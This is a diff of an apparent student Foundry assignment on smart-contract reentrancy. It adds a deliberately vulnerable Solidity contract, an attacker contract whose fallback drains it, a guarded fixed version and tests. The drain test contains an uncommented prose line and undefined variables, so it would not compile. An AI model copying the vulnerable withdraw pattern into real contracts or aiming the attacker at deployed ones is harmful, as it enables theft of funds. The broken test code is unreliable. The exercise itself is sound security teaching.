Submission/assessment1/olorunshogo

.gitignore

@@ -22,3 +22,6 @@ Thumbs.db
 .idea/
 *.swp
 *.swo
+
+
+lib/

.gitmodules

@@ -0,0 +1,3 @@
+[submodule "assignments/foundry-test-assignment/lib/openzeppelin-contracts"]
+	path = assignments/foundry-test-assignment/lib/openzeppelin-contracts
+	url = https://github.com/OpenZeppelin/openzeppelin-contracts

13-04-26-test/assessment1/README.md

@@ -0,0 +1,66 @@
+## Foundry
+
+**Foundry is a blazing fast, portable and modular toolkit for Ethereum application development written in Rust.**
+
+Foundry consists of:
+
+- **Forge**: Ethereum testing framework (like Truffle, Hardhat and DappTools).
+- **Cast**: Swiss army knife for interacting with EVM smart contracts, sending transactions and getting chain data.
+- **Anvil**: Local Ethereum node, akin to Ganache, Hardhat Network.
+- **Chisel**: Fast, utilitarian, and verbose solidity REPL.
+
+## Documentation
+
+https://book.getfoundry.sh/
+
+## Usage
+
+### Build
+
+```shell
+$ forge build
+```
+
+### Test
+
+```shell
+$ forge test
+```
+
+### Format
+
+```shell
+$ forge fmt
+```
+
+### Gas Snapshots
+
+```shell
+$ forge snapshot
+```
+
+### Anvil
+
+```shell
+$ anvil
+```
+
+### Deploy
+
+```shell
+$ forge script script/Counter.s.sol:CounterScript --rpc-url <your_rpc_url> --private-key <your_private_key>
+```
+
+### Cast
+
+```shell
+$ cast <subcommand>
+```
+
+### Help
+
+```shell
+$ forge --help
+$ anvil --help
+$ cast --help
+```

13-04-26-test/assessment1/foundry.toml

@@ -0,0 +1,6 @@
+[profile.default]
+src = "src"
+out = "out"
+libs = ["lib"]
+
+# See more config options https://github.com/foundry-rs/foundry/blob/master/crates/config/README.md#all-options

13-04-26-test/assessment1/src/AssessmentContract.sol

@@ -0,0 +1,73 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.33;
+
+// === Vulnerable Contract
+contract VulnerableContract {
+  mapping(address => uint256) public balances;
+
+  function deposit() public payable {
+    balances[msg.sender] += msg.value;
+  }
+
+  function withdraw(uint256 amount) public {
+    require(balances[msg.sender] >= amount, 'Insufficient balance');
+
+    (bool success, ) = msg.sender.call{value: amount}('');
+    require(success, 'Transfer failed');
+
+    balances[msg.sender] -= amount;
+  }
+}
+
+// === Attacker Contract
+contract AttackerContract {
+  VulnerableContract public vulnerableContract;
+
+  constructor(address _vulnerableContractAddress) {
+    vulnerableContract = VulnerableContract(_vulnerableContractAddress);
+  }
+
+  // === This is called anytime the contract receives ether
+  fallback() external payable {
+    if (address(vulnerableContract).balance >= 1 ether) {
+      vulnerableContract.withdraw(1 ether);
+    }
+  }
+
+  function exploit() external payable {
+    require(msg.value >= 1 ether);
+    vulnerableContract.deposit{value: 1 ether}();
+    vulnerableContract.withdraw(1 ether);
+  }
+
+  // receive() external payable;
+}
+
+contract ReentrancyGuard {
+  bool internal _notInteracted = true;
+
+  modifier nonReentrant() {
+    require(_notInteracted, "ReentrancyGuard: reentrant call");
+    _notInteracted = false;
+    _;
+    _notInteracted = true;
+  }
+
+}
+
+contract FixedContract is ReentrancyGuard {
+  mapping(address => uint256) public balances;
+
+  function deposit() external payable nonReentrant {
+    balances[msg.sender] += msg.value;
+  }
+
+  function withdraw(uint256 amount) external nonReentrant {
+    require(balances[msg.sender] >= amount, 'Insufficient balance');
+
+    balances[msg.sender] -= amount;
+
+    (bool success, ) = msg.sender.call{value: amount}('');
+    require(success, 'Transfer failed');
+  }
+}

13-04-26-test/assessment1/test/Assessment.t.sol

@@ -0,0 +1,106 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.28;
+
+import {Test} from 'forge-std/Test.sol';
+import '../src/AssessmentContract.sol';
+
+contract AssessmentTest is Test {
+  VulnerableContract public vulnerableContract;
+  AttackerContract public attackerContract;
+  FixedContract public fixedContract;
+
+  address owner = makeAddr('owner');
+  address attacker = makeAddr('attacker');
+  address user = makeAddr('user');
+
+  function setUp() public {
+    vulnerableContract = new VulnerableContract();
+    fixedContract = new FixedContract();
+    attackerContract = new AttackerContract(address(vulnerableContract));
+
+    vm.deal(owner, 10 ether);
+    vm.deal(attacker, 2 ether);
+    vm.deal(user, 2 ether);
+  }
+
+  // === Basic Deployment Tests
+  function test_if_deployment_initialBalance_isZero() public view {
+    // uint256 contractBalance = vulnerableContract.balances;
+    assertEq(vulnerableContract.balances(owner), 0);
+  }
+
+  function test_deposit_will_updateBalance() public {
+    vm.prank(owner);
+    vulnerableContract.deposit{value: 1 ether}();
+    assertEq(vulnerableContract.balances(owner), 1 ether);
+  }
+
+  function test_withdraw_will_reduceBalance() public {
+    vm.prank(owner);
+    vulnerableContract.deposit{value: 1 ether}();
+
+    vm.prank(owner);
+    vulnerableContract.withdraw(1 ether);
+
+    assertEq(vulnerableContract.balances(owner), 0);
+  }
+
+  function test_withdraw_revertsIfInsufficientBalance() public {
+    vm.prank(owner);
+    vm.expectRevert('Insufficient balance');
+    vulnerableContract.withdraw(1 ether);
+  }
+
+  // === Reentrancy attack
+  function test_reentrancyAttack_to_drain_vulnerable_contract() public {
+    // I'm depositing into the contract
+    vm.prank(owner);
+    vulnerableContract.deposit{value: 5 ether}();
+
+    // Initial balances
+    uint256 contractInitialBalance = address(vulnerableContract).balance;
+    uint256 attackerInitialBalance = address(attackerContract).balance;
+
+    vm.prank(attacker);
+    attackerContract.exploit{value: 1 ether}();
+
+    Attacker may now drain more than they put in
+    assertGt(
+      address(attackerContract).balance,
+      attackerBalanceBefore + 1 ether,
+      "Attacker should have drained extra ETH"
+    );
+    assertLt(
+      address(vulnerableContract).balance,
+      contractBalanceBefore,
+      "Vulnerable contract should have lost ETH"
+    );
+  }
+
+  // === Fixed Contract Tests
+  function test_if_fixed_deployment_initialBalance_isZero() public view {
+    assertEq(fixedContract.balances(user), 0);
+  }
+
+  function test_fixed_deposit_will_updateBalance() public {
+    vm.prank(user);
+    fixedContract.deposit{value: 1 ether}();
+    assertEq(fixedContract.balances(user), 1 ether);
+  }
+
+  function test_fixed_withdraw_will_reduceBalance() public {
+    vm.prank(user);
+    fixedContract.deposit{value: 1 ether}();
+
+    vm.prank(user);
+    fixedContract.withdraw(1 ether);
+
+    assertEq(vulnerableContract.balances(user), 0);
+  }
+
+  function test_fixed_withdraw_revertsIfInsufficientBalance() public {
+    vm.prank(user);
+    vm.expectRevert('Insufficient balance');
+    fixedContract.withdraw(1 ether);
+  }
+}

assignments/Olorunshogo.md

@@ -0,0 +1,5 @@
+
+1. [Link to the upgradeable contracts using both open zeppelin and the diamond](https://github.com/Olorunshogo/UpgradeableContract)
+
+
+2. [Link to the article](https://medium.com/@shownzy001/upgradeable-contracts-b4d8c5c3d61e)

assignments/foundry-test-assignment/.github/workflows/test.yml

@@ -0,0 +1,38 @@
+name: CI
+
+permissions: {}
+
+on:
+  push:
+  pull_request:
+  workflow_dispatch:
+
+env:
+  FOUNDRY_PROFILE: ci
+
+jobs:
+  check:
+    name: Foundry project
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - uses: actions/checkout@v5
+        with:
+          persist-credentials: false
+          submodules: recursive
+
+      - name: Install Foundry
+        uses: foundry-rs/foundry-toolchain@v1
+
+      - name: Show Forge version
+        run: forge --version
+
+      - name: Run Forge fmt
+        run: forge fmt --check
+
+      - name: Run Forge build
+        run: forge build --sizes
+
+      - name: Run Forge tests
+        run: forge test -vvv

assignments/foundry-test-assignment/.gitignore

@@ -0,0 +1,17 @@
+# Compiler files
+cache/
+out/
+
+# Ignores development broadcast logs
+!/broadcast
+/broadcast/*/31337/
+/broadcast/**/dry-run/
+
+# Docs
+docs/
+
+# Dotenv file
+.env
+
+
+lib/

assignments/foundry-test-assignment/.gitmodules

@@ -0,0 +1,3 @@
+[submodule "lib/forge-std"]
+	path = lib/forge-std
+	url = https://github.com/foundry-rs/forge-std